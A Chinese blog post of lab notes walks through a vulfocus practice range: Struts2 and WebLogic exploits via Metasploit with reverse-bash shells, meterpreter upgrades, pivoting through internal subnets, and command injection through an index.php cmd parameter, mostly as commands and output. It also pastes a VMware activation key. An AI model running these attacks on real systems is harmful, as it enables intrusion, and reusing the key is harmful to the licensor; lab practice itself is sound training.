MarshVer

网络空间安全笔记

发表于
本文字数: 23k 阅读时长 ≈ 38 分钟
网络空间安全笔记主要是vulfocus

1.下载VMware 17并安装kali

  1. VMware激活码:MC60H DWHD5 H80U9 6V85M 8280D
  2. 下载VMware版的kali:https://www.kali.org/get-kali/#kali-virtual-machines
  3. VMware选择kali .vmx后缀的文件,启动kali系统(账号密码均为kali)(可将内存提高到6-8G,不然bulfocus容易卡死)
  4. VMware给kali增加一个仅主机模式的网卡(以供本地主机ssh连接和访问WebGoat)

2.配置kali

  1. ps aux | grep ssh //查看ssh是否启动
  2. sudo systemctl enable ssh //启用开机启动ssh
  3. sudo systemctl start ssh //启动ssh
  4. ip a //查看IP地址

3.本地ssh本地连接虚拟机

3.1.cmd连接kali

  1. ssh kali@192.168.137.128 //本地远程连接kali,ip地址为仅主机模式网卡

3.2.vscode连接kali

  1. vscode下载Remote - SSH插件
  2. 搜索栏输入>ssh,选择添加新的SSH主机
  3. 再次输入ssh kali@192.168.137.128
  4. 选择本地C:\users\zhuze.ssh\config的配置文件(保存kali到本地ssh配置文件)
  5. 再次在搜索栏输入>ssh,选择:将当前窗口连接到主机,选择kali的ip地址
  6. 选择Linux->选择确定->输入密码:kali即可显示kali文件夹

4.下载docker并配置

  1. apt update //更新软件包
  2. sudo apt install docker.io docker-compose //apt下载docker
  3. sudo usermod -a -G docker kali //添加当前用户加入docker用户组

5.下载ctf-games并拉取vulfocus镜像

  1. git clone https://github.com/c4pr1c3/ctf-games.git
  2. 进入 /ctf-games/fofapro/vulfocus
  3. 拉取拉取vulfocus镜像
1
docker pull vulfocus/vulfocus:latest

6.安装jq

  1. 直接启动 bash start.sh 发生报错,显示未安装jq
  2. 安装jq
1
sudo apt-get install jq

7.启动并访问vulfocus

  1. 进入 /ctf-games/fofapro/vulfocus 并启动
1
bash start.sh
  1. 直接确定或者输入你的仅主机模式的ip地址
  2. 本地浏览器输入仅主机模式的ip地址即可访问:http://192.168.223.128/
  3. 账号密码均为admin

8.基本使用

  1. 进入镜像管理-镜像管理
  2. 点击一键同步同步练习环境
  3. 可搜索相应的镜像名称并下载
  4. 等待下载完成即可在首页显示

9.场景管理

9.1.添加场景

  1. 进入场景管理-环境编排管理
  2. 点击添加场景,创建编排场景,点击上传,并上传DMZ.zip文件并保存
  3. 选择对应场景并发布,等待下载完成

9.2.启动场景

  1. 选择场景菜单
  2. 点击对应的场景
  3. 启动场景便可看到访问地址
  4. 用当前ip地址加访问地址的端口即可进入该场景

10.安装metasploit-framework(渗透测试框架)

1
2
3
4
5
6
7
# 进入root用户
sudo su - 

# 更新安装包索引
apt update
# 更新metasploit-framework
apt upgrade metasploit-framework

11.获取flag1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
# 初始化metasploit本地工作数据库
msfdb init
# 若已存在本地工作数据库,可重置该数据库
msfdb reinit

# 启动 msfconsole
msfconsole
# 建立工作区
workspace -a demo
# 查看工作区
workspace -l
# 确认已连接 pgsql
db_status
# 开始信息收集
db_nmap -p 9937 192.168.172.128 -n -A  // -n:禁止ip地址反向解析域名,加快扫描速度;- A:常用的套装参数,开启端口识别、操作系统指纹识别等
# 查看扫描的结果
hosts

# Hosts
# =====
# 
# address          mac  name  os_name  os_flavor  os_sp  purpose  info  comments
# -------          ---  ----  -------  ---------  -----  -------  ----  --------
# 192.168.172.128             Unknown                    device



# 查询exploit包含struts2的攻击工具
search struts2 type:exploit

# Matching Modules
# ================
# 
#    #   Name                                                                       Disclosure Date  Rank       Check  Description
#    -   ----                                                                       ---------------  ----       -----  -----------
#    0   exploit/multi/http/struts_dev_mode                                         2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
#    1   exploit/multi/http/struts2_multi_eval_ognl                                 2020-09-14       excellent  Yes    Apache Struts 2 Forced Multi OGNL Evaluation
#    2     \_ target: Unix Command                                                  .                .          .      .
#    3     \_ target: Linux Dropper                                                 .                .          .      .
#    4   exploit/multi/http/struts2_namespace_ognl                                  2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
#    5     \_ target: Automatic detection                                           .                .          .      .
#    6     \_ target: Windows                                                       .                .          .      .
#    7     \_ target: Linux                                                         .                .          .      .
#    8   exploit/multi/http/struts2_rest_xstream                                    2017-09-05       excellent  Yes    Apache Struts 2 REST Plugin XStream RCE
#    9     \_ target: Unix (In-Memory)                                              .                .          .      .
#    10    \_ target: Windows (In-Memory)                                           .                .          .      .
#    11    \_ target: Python (In-Memory)                                            .                .          .      .
#    12    \_ target: PowerShell (In-Memory)                                        .                .          .      .
#    13    \_ target: Linux (Dropper)                                               .                .          .      .
#    14    \_ target: Windows (Dropper)                                             .                .          .      .
#    15  exploit/multi/http/struts2_code_exec_showcase                              2017-07-07       excellent  Yes    Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
#    16  exploit/multi/http/struts_code_exec_classloader                            2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
#    17    \_ target: Java                                                          .                .          .      .
#    18    \_ target: Linux                                                         .                .          .      .
#    19    \_ target: Windows                                                       .                .          .      .
#    20    \_ target: Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)  .                .          .      .
#    21  exploit/multi/http/struts2_content_type_ognl                               2017-03-07       excellent  Yes    Apache Struts Jakarta Multipart Parser OGNL Injection
#    22  exploit/multi/http/struts_code_exec_parameters                             2011-10-01       excellent  Yes    Apache Struts ParametersInterceptor Remote Code Execution
#    23    \_ target: Windows Universal                                             .                .          .      .
#    24    \_ target: Linux Universal                                               .                .          .      .
#    25    \_ target: Java Universal


# 查看struts2_multi_eval_ognl
info 2
# 使用struts2_multi_eval_ognl
use 2
或者
use struts2_multi_eval_ognl
# 查看可用payloads
show payloads
# 使用合适的payload
set payload payload/cmd/unix/reverse_bash
# 查看可配置参数列表
show options

# Module options (exploit/multi/http/struts2_multi_eval_ognl):
# 
#    Name       Current Setting  Required  Description
#    ----       ---------------  --------  -----------
#    CVE        CVE-2020-17530   yes       Vulnerability to use (Accepted: CVE-2020-17530, CVE-2019-0230)
#    NAME       id               yes       The HTTP query parameter or form data name
#    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
#    RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
#    RPORT      8080             yes       The target port (TCP)
#    SSL        false            no        Negotiate SSL/TLS for outgoing connections
#    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
#    TARGETURI  /                yes       A valid base path to a struts application
#    URIPATH                     no        The URI to use for this exploit (default is random)
#    VHOST                       no        HTTP server virtual host
# 
# 
#    When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
# 
#    Name     Current Setting  Required  Description
#    ----     ---------------  --------  -----------
#    SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses
#                                        .
#    SRVPORT  8080             yes       The local port to listen on.
# 
# 
# Payload options (cmd/unix/reverse_bash):
# 
#    Name   Current Setting  Required  Description
#    ----   ---------------  --------  -----------
#    LHOST  192.168.147.128  yes       The listen address (an interface may be specified)
#    LPORT  4444             yes       The listen port
# 
# 
# Exploit target:
# 
#    Id  Name
#    --  ----
#    0   Unix Command



# kali终端查看4444端口是否被占用,未被占用可直接使用
ss -lntp | grep 4444

# 返回msfconsole设置攻击者主机lhost
set lhost 192.168.172.128
# 设置被攻击者主机rhosts
set rhosts 192.168.172.128
# 设置被攻击者rport
set rport 63467
# 查看修改后的可配置参数列表
show options

# Module options (exploit/multi/http/struts2_multi_eval_ognl):
# 
#    Name       Current Setting  Required  Description
#    ----       ---------------  --------  -----------
#    CVE        CVE-2020-17530   yes       Vulnerability to use (Accepted: CVE-2020-17530, CVE-2019-0230)
#    NAME       id               yes       The HTTP query parameter or form data name
#    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
#    RHOSTS     192.168.172.128  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
#    RPORT      18805             yes       The target port (TCP)
#    SSL        false            no        Negotiate SSL/TLS for outgoing connections
#    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
#    TARGETURI  /                yes       A valid base path to a struts application
#    URIPATH                     no        The URI to use for this exploit (default is random)
#    VHOST                       no        HTTP server virtual host
# 
# 
#    When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

#    Name     Current Setting  Required  Description
#    ----     ---------------  --------  -----------
#    SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses
#                                        .
#    SRVPORT  8080             yes       The local port to listen on.
# 
# 
# Payload options (cmd/unix/reverse_bash):
# 
#    Name   Current Setting  Required  Description
#    ----   ---------------  --------  -----------
#    LHOST  192.168.172.128  yes       The listen address (an interface may be specified)
#    LPORT  4444             yes       The listen port
# 
# 
# Exploit target:
# 
#    Id  Name
#    --  ----
#    0   Unix Command


## 注:这里恰好攻击者与被攻击者为同一主机



# 启动后台攻击
run -j
## 显示Command shell session 1 opened (192.168.172.128:4444 -> 192.171.84.5:35924) at 2024-06-12 04:28:32 -0400说明攻击成功

# 查看打开的反向Shell
sessions -l

# Active sessions
# ===============
# 
#   Id  Name  Type            Information  Connection
#   --  ----  ----            -----------  ----------
#   1         shell cmd/unix               192.168.172.128:4444 -> 192.171.84.5:35924 (192.168.172.128)



# 进入会话 1
sessions -i 1
# 运行后无命令行交互提示信息,试试Bash指令get flag-1
ls /tmp

# flag-{bmh15a88055-61c7-45a6-95a4-6d9a6115a2e1}
# hsperfdata_root



## 将flag-{bmh15a88055-61c7-45a6-95a4-6d9a6115a2e1}输入场景的flag即成功
## 通过 CTRL-Z 将当前会话放到后台继续执行

12.获取flag2,3,4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
# 查询post包含meterpreter的攻击工具并使用
search meterpreter type:post
# 或直接使用post/multi/manage/shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
# 查看可配置参数列表
show options

# Module options (post/multi/manage/shell_to_meterpreter):
# 
#    Name     Current Setting  Required  Description
#    ----     ---------------  --------  -----------
#    HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
#    LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
#    LPORT    4433             yes       Port for payload to connect to.
#    SESSION                   yes       The session to run this module on



# 设置攻击主机
set lhost 192.168.172.128
# 指定1号会话进行升级
set session 1
# 后台运行
run -j
# 查看打开的 reverse shell
sessions -l

# Active sessions
# ===============
# 
#   Id  Name  Type                   Information          Connection
#   --  ----  ----                   -----------          ----------
#   1         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.5:56920 (192.168.172.128)
#   2         meterpreter x86/linux  root @ 192.171.84.5  192.168.172.128:4433 -> 192.171.84.5:52264 (192.168.172.128)



# 进入 meterpreter 会话 2
sessions -i 2
# 查看网卡列表
ipconfig

# Interface  1
# ============
# Name         : lo
# Hardware MAC : 00:00:00:00:00:00
# MTU          : 65536
# Flags        : UP,LOOPBACK
# IPv4 Address : 127.0.0.1
# IPv4 Netmask : 255.0.0.0
# 
# 
# Interface 24
# ============
# Name         : eth0
# Hardware MAC : 02:42:c0:ab:54:05
# MTU          : 1500
# Flags        : UP,BROADCAST,MULTICAST
# IPv4 Address : 192.171.84.5
# IPv4 Netmask : 255.255.255.0



# 查看路由表
route

# IPv4 network routes
# ===================
# 
#     Subnet        Netmask        Gateway       Metric  Interface
#     ------        -------        -------       ------  ---------
#     0.0.0.0       0.0.0.0        192.171.84.1  0       eth0
#     192.171.84.0  255.255.255.0  0.0.0.0       0       eth0



# 查看 ARP 表
arp

# ARP cache
# =========
# 
#     IP address    MAC address        Interface
#     ----------    -----------        ---------
#     192.171.84.1  02:42:96:03:ee:2a  eth0



# 添加Pivot路由
run autoroute -s 192.171.84.0/24
# 检查Pivot路由是否已创建成功
run autoroute -p

# Active Routing Table
# ====================
# 
#    Subnet             Netmask            Gateway
#    ------             -------            -------
#    192.171.84.0       255.255.255.0      Session 2



## CTRL-Z后台运行

# 使用auxiliary/scanner/portscan/tcp扫描
search portscan
或者
use auxiliary/scanner/portscan/tcp

# 查看可配置参数列表
show options

# Module options (auxiliary/scanner/portscan/tcp):
# 
#    Name         Current Setting  Required  Description
#    ----         ---------------  --------  -----------
#    CONCURRENCY  10               yes       The number of concurrent ports to check per host
#    DELAY        0                yes       The delay between connections, per thread, in milliseconds
#    JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
#    PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
#    RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
#    THREADS      1                yes       The number of concurrent threads (max one per host)
#    TIMEOUT      1000             yes       The socket connect timeout in milliseconds



# 根据子网掩码推导
set rhosts 192.171.84.2-254
# 设置port
set ports 1-66535 # 扫描
或者
set ports 7001 # 根据经验
# 设置线程数
set threads 10
# 开始扫描
run -j
## 等到扫描结果 100%
# 查看主机存活情况
hosts

# Hosts
# =====
# 
# address          mac  name          os_name                           os_flavor  os_sp  purpose   info  comments
# -------          ---  ----          -------                           ---------  -----  -------   ----  --------
# 192.168.172.128       192.171.84.5  Debian 10.6 (Linux 6.8.11-amd64)                    firewall
# 192.171.84.2                        Unknown                                             device
# 192.171.84.3                        Unknown                                             device
# 192.171.84.4                        Unknown                                             device
# 192.171.84.5                                                                            client



# 查看发现的服务列表
services

# Services
# ========
# 
# host             port  proto  name  state   info
# ----             ----  -----  ----  -----   ----
# 192.168.172.128  9937  tcp          closed
# 192.171.84.2     7001  tcp          open
# 192.171.84.3     7001  tcp          open
# 192.171.84.4     7001  tcp          open



# 使用auxiliary/server/socks_proxy
search socks_proxy
或者
use auxiliary/server/socks_proxy
# 开始扫描
run -j

# 或者在kali终端扫描
# 另开kali终端查看1080端口有无占用
ss -lntp | grep 1080
# 查看有没有安装proxychains4
apt policy proxychains4
# 安装过需要编辑配置文件
sudo vim /etc/proxychains4.conf  # 注释socks4 127.0.0.1 9050,添加socks5 127.0.0.1 1080
或者
sudo sed -i.bak -r "s/socks4\s+127.0.0.1\s+9050/socks5 127.0.0.1 1080/g" /etc/proxychains4.conf
# 再次查看1080端口
ss -lntp | grep 1080

# LISTEN 0      256          0.0.0.0:1080       0.0.0.0:*    users:(("ruby",pid=62575,fd=15))



# 开始扫描(命令窗口运行)
proxychains sudo nmap -vv -n -p 7001 -Pn -sT 192.171.84.2-5



# 回到metasploit会话窗口
# 重新进入 会话1
sessions -i 1
# 查看http请求详细信息
curl http://192.171.84.2:7001 -vv

# > GET / HTTP/1.1
# > Host: 192.171.84.2:7001
# > User-Agent: curl/7.64.0
# > Accept: */*
# > 
# < HTTP/1.1 404 Not Found
# < Date: Wed, 12 Jun 2024 11:24:32 GMT
# < Content-Length: 1164
# < Content-Type: text/html; charset=UTF-8
# < X-Powered-By: Servlet/2.5 JSP/2.1
# < 
# { [1164 bytes data]
# 100  1164  100  1164    0     0  33257      0 --:--:-- --:--:-- --:--:-- 34235
# * Connection #0 to host 192.171.84.2 left intact
# <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
# <HTML>
# <HEAD>
# <TITLE>Error 404--Not Found</TITLE>
# </HEAD>
# <BODY bgcolor="white">
# <FONT FACE=Helvetica><BR CLEAR=all>
# <TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all>
# <FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 404--Not Found</H2>
# </FONT></TD></TR>
# </TABLE>
# <TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><FONT FACE="Helvetica" SIZE="3"><H3>From RFC 2068 <i>Hypertext Transfer Protocol -- HTTP/1.1</i>:</H3>
# </FONT><FONT FACE="Helvetica" SIZE="3"><H4>10.4.5 404 Not Found</H4>
# </FONT><P><FONT FACE="Courier New">The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent.</p><p>If the server does not wish to make this information available to the client, the status code 403 (Forbidden) can be used instead. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no # # forwarding address.</FONT></P>
# </FONT></TD></TR>
# </TABLE>
# 
# </BODY>
# </HTML>



curl http://192.171.84.3:7001 -vv
curl http://192.171.84.4:7001 -vv

# 查找cve-2019-2725并使用
search cve-2019-2725
use 0
# 查看可配置参数列表
show options

# Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):
# 
#    Name       Current Setting               Required  Description
#    ----       ---------------               --------  -----------
#    Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
#    RHOSTS                                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
#    RPORT      7001                          yes       The target port (TCP)
#    SSL        false                         no        Negotiate SSL/TLS for outgoing connections
#    TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
#    VHOST                                    no        HTTP server virtual host
# 
# 
# Payload options (cmd/unix/reverse_bash):
# 
#    Name   Current Setting  Required  Description
#    ----   ---------------  --------  -----------
#    LHOST                   yes       The listen address (an interface may be specified)
#    LPORT  4444             yes       The listen port
# 
# 
# Exploit target:
# 
#    Id  Name
#    --  ----
#    0   Unix



# 分别设置不同的RHOSTS攻击
set RHOSTS 192.171.84.2
set RHOSTS 192.171.84.3
set RHOSTS 192.171.84.4
# 设置lhost
set lhost 192.168.172.128
# 分别 run
run -j
# 查看打开的反向Shell
sessions -l

# Active sessions
# ===============
# 
#   Id  Name  Type                   Information          Connection
#   --  ----  ----                   -----------          ----------
#   1         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.5:39212 (192.168.172.128)
#   2         meterpreter x86/linux  root @ 192.171.84.5  192.168.172.128:4433 -> 192.171.84.5:37818 (192.168.172.128)
#   3         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.2:44310 (192.171.84.2)
#   4         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.3:48286 (192.171.84.3)
#   5         shell cmd/unix                              192.168.172.128:4444 -> 192.172.85.4:37296 (192.171.84.4)



# get flag2-4
sessions -c "ls /tmp" -i 3,4,5

# [*] Running 'ls /tmp' on shell session 3 (192.171.84.2)
# bea1061393648233859820.tmp
# cookie.txt
# flag-{bmh72f110f7-e1fb-4e67-8a11-40c8b4024c5d}
# hsperfdata_root
# packages
# wlstTemproot
#
# [*] Running 'ls /tmp' on shell session 4 (192.171.84.3)
# bea1061393648233859820.tmp
# cookie.txt
# flag-{bmha5f01ddb-551d-4f7e-a630-323180cdba0a}
# hsperfdata_root
# packages
# wlstTemproot
# 
# [*] Running 'ls /tmp' on shell session 5 (192.171.84.4)
# bea1061393648233859820.tmp
# cookie.txt
# flag-{bmhcf14ca31-3adf-4458-ae9e-84773b89b38f}
# hsperfdata_root
# packages
# wlstTemproot

13.获取flag5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
# 通过网卡、路由、ARP 发现新子网 192.169.85.0/24
sessions -c "ifconfig" -i 3,4,5
 
# [*] Running 'ifconfig' on shell session 3 (192.171.84.2)
# eth0      Link encap:Ethernet  HWaddr 02:42:c0:ab:54:02  
#           inet addr:192.171.84.2  Bcast:192.171.84.255  Mask:255.255.255.0
#           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
#           RX packets:846 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:0 
#           RX bytes:42809 (42.8 KB)  TX bytes:5375 (5.3 KB)
# 
# lo        Link encap:Local Loopback  
#           inet addr:127.0.0.1  Mask:255.0.0.0
#           UP LOOPBACK RUNNING  MTU:65536  Metric:1
#           RX packets:6 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:1000 
#           RX bytes:328 (328.0 B)  TX bytes:328 (328.0 B)
# 
# 
# [*] Running 'ifconfig' on shell session 4 (192.171.84.3)
# eth0      Link encap:Ethernet  HWaddr 02:42:c0:ab:54:03  
#           inet addr:192.171.84.3  Bcast:192.171.84.255  Mask:255.255.255.0
#           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
#           RX packets:822 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:39 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:0 
#           RX bytes:39909 (39.9 KB)  TX bytes:2926 (2.9 KB)
# 
# lo        Link encap:Local Loopback  
#           inet addr:127.0.0.1  Mask:255.0.0.0
#           UP LOOPBACK RUNNING  MTU:65536  Metric:1
#           RX packets:6 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:1000 
#           RX bytes:328 (328.0 B)  TX bytes:328 (328.0 B)
# 
#
# [*] Running 'ifconfig' on shell session 5 (192.171.84.4)
# eth0      Link encap:Ethernet  HWaddr 02:42:c0:ac:55:03  
#           inet addr:192.172.85.3  Bcast:192.172.85.255  Mask:255.255.255.0
#           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
#           RX packets:30 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:0 
#           RX bytes:2220 (2.2 KB)  TX bytes:651 (651.0 B)
# 
# eth1      Link encap:Ethernet  HWaddr 02:42:c0:ab:54:05  
#           inet addr:192.171.84.4  Bcast:192.171.84.255  Mask:255.255.255.0
#           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
#           RX packets:793 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:0 
#           RX bytes:35643 (35.6 KB)  TX bytes:770 (770.0 B)
# 
# lo        Link encap:Local Loopback  
#           inet addr:127.0.0.1  Mask:255.0.0.0
#           UP LOOPBACK RUNNING  MTU:65536  Metric:1
#           RX packets:6 errors:0 dropped:0 overruns:0 frame:0
#           TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
#           collisions:0 txqueuelen:1000 
#           RX bytes:328 (328.0 B)  TX bytes:328 (328.0 B)


# 发现新的网段192.172.85.3
# 将会话5升级为 meterpreter shell
sessions -u 5
# 查看打开的反向Shell
sessions -l

# Active sessions
# ===============
# 
#   Id  Name  Type                   Information          Connection
#   --  ----  ----                   -----------          ----------
#   1         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.5:39212 (192.168.172.128)
#   2         meterpreter x86/linux  root @ 192.171.84.4  192.168.172.128:4433 -> 192.171.84.5:37818 (192.168.172.128)
#   3         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.2:44310 (192.171.84.2)
#   4         shell cmd/unix                              192.168.172.128:4444 -> 192.171.84.3:48286 (192.171.84.3)
#   5         shell cmd/unix                              192.168.172.128:4444 -> 192.172.85.4:37296 (192.171.84.4)
#   6         meterpreter x86/linux  root @ 192.172.85.3  192.168.172.128:4433 -> 192.172.85.4:44160 (192.171.84.4)



# 进入会话6
sessions -i 6
# 查看路由器
route

# IPv4 network routes
# ===================
# 
#     Subnet        Netmask        Gateway       Metric  Interface
#     ------        -------        -------       ------  ---------
#     0.0.0.0       0.0.0.0        192.172.85.1  0       eth0
#     192.171.84.0  255.255.255.0  0.0.0.0       0       eth1
#     192.172.85.0  255.255.255.0  0.0.0.0       0       eth0



# 将新发现的子网加入Pivot Route
run autoroute -s 192.172.85.0/24
# 查看Pivot Route
run autoroute -p

# Active Routing Table
# ====================
# 
#    Subnet             Netmask            Gateway
#    ------             -------            -------
#    192.171.84.0       255.255.255.0      Session 2
#    192.172.85.0       255.255.255.0      Session 6


## ctrl+z后台运行

# 使用端口扫描工具
use scanner/portscan/tcp
# 设置RHOSTS和ports
set RHOSTS 192.172.85.2-254
set ports 80
# 开始扫描
run
# 查看发现的服务列表
services

# Services
# ========
# 
# host             port  proto  name  state   info
# ----             ----  -----  ----  -----   ----
# 192.168.172.128  9937  tcp          closed
# 192.171.84.2     7001  tcp          open
# 192.171.84.3     7001  tcp          open
# 192.171.84.4     7001  tcp          open
# 192.172.85.2     80    tcp          open



## 发现终点靶标 192.172.85.2 80(tcp)

# 利用跳板机的shell会话访问最终靶标
sessions -c "curl http://192.172.85.2" -i 6

# /bin/sh: 1: curl: not found



# 发现没安装curl,试试wget
sessions -c "wget http://192.172.85.2" -i 6

# [*] Running 'wget http://192.172.85.2' on meterpreter session 6 (192.171.84.5)
# --2024-06-12 13:02:04--  http://192.172.85.2/
# Connecting to 192.172.85.2:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: unspecified [text/html]
# Saving to: 'index.html'
# 
#      0K                                                        95.7K=0s
# 
# 2024-06-12 13:02:05 (95.7 KB/s) - 'index.html' saved [21]



# 发现没有命令执行回显,试试组合命令
sessions -c "wget http://192.172.85.2 -O /tmp/result && cat /tmp/result" -i 6

# [*] Running 'wget http://192.172.85.2 -O /tmp/result && cat /tmp/result' on meterpreter session 6 (192.171.84.5)
# --2024-06-12 13:03:19--  http://192.172.85.2/
# Connecting to 192.172.85.2:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: unspecified [text/html]
# Saving to: '/tmp/result'
# 
#      0K                                                        3.13M=0s
# 
# 2024-06-12 13:03:19 (3.13 MB/s) - '/tmp/result' saved [21]
# 
# index.php?cmd=ls /tmp



# 发现 get flag 提示
sessions -c "wget 'http://192.172.85.2/index.php?cmd=ls /tmp' -O /tmp/result && cat /tmp/result" -i 6

# [*] Running 'wget 'http://192.172.85.2/index.php?cmd=ls /tmp' -O /tmp/result && cat /tmp/result' on meterpreter session 6 (192.171.84.5)
# --2024-06-12 13:03:55--  http://192.172.85.2/index.php?cmd=ls%20/tmp
# Connecting to 192.172.85.2:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: unspecified [text/html]
# Saving to: '/tmp/result'
# 
#      0K                                                        3.55M=0s
# 
# 2024-06-12 13:03:55 (3.55 MB/s) - '/tmp/result' saved [68]
# 
# index.php?cmd=ls /tmpflag-{bmhd132cbf4-d19f-4dc9-9a43-95a500678c84}

问题汇总

kali无法联网

  1. kali关机
  2. VMware->编辑->虚拟网络编辑器->更改设置->还原默认设置
  3. 等待完成打开kali即可

sudo touch创建的markdown文档vscode无法修改

issue_1

  1. 直接使用touch
  2. vscode直接新建

git push每次都要输入账号密码

  1. 进入cuc的gitlab文件夹,输入
    1
    git config credential.helper store
  2. 再次输入账号密码后,以后便不再输入

vscode的remote-ssh配置免密登录

  1. 本机cmd执行 ssh-keygen -t rsa 生成ssh密钥
  2. 进入 C:\Users\zhu.ssh,复制id_rsa.pub文件的密钥
  3. linux系统进入 ~/.ssh/authorized_keys(若没有,则新建)
